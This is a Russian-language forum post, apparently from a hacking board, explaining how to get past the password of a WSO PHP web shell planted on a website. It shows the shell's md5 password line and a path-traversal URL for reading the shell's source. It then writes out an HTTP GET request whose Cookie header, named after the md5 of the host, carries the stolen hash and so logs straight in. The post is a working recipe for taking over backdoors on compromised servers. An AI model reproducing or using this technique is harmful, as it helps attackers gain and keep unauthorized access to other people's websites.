Не то, что бы это дикий пиздец, но если вдруг, вы забыли пароль к своему шеллу WSO, и у вас есть возможность прочитать исходник, можно увидеть вполне элементарную строчку:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"5deeb7c8589e337d46a3b2f807af33fd"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]# md5(пароль)[/COLOR][/COLOR]
Но к сожалению если ваша память коротка, а cmd5 и подобные сервисы не в силах сбрутить пароль по типу "
md5(FmST[3XjPW) = 5deeb7c8589e337d46a3b2f807af33fd", а текстовый документ с исходным паролем чудом не сохранился. Расстраиваться не нужно. Достаточно послать в запросе в заголовке Cookie md5 сумму хоста, и прочитанный хеш.
К примеру, шелл тут: http://google.com/images/wso.php
Возможность прочитать исходник тут: http://google.com/index.php?file=../images/wso.php
Получаем:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$auth_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"5deeb7c8589e337d46a3b2f807af33fd"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]# md5(пароль)[/COLOR][/COLOR]
Посылаем запрос:
Код:
GET /images/wso.php HTTP/1.1
Host: google.com
Cookie: 1d5920f4b44b27a802bd77c4f0536f5a=5deeb7c8589e337d46a3b2f807af33fd
Меняем пароль, на тот который в состоянии запомнить, и всё.
Не знаю кому эта информация сможет пригодиться, но пусть полежит здесь.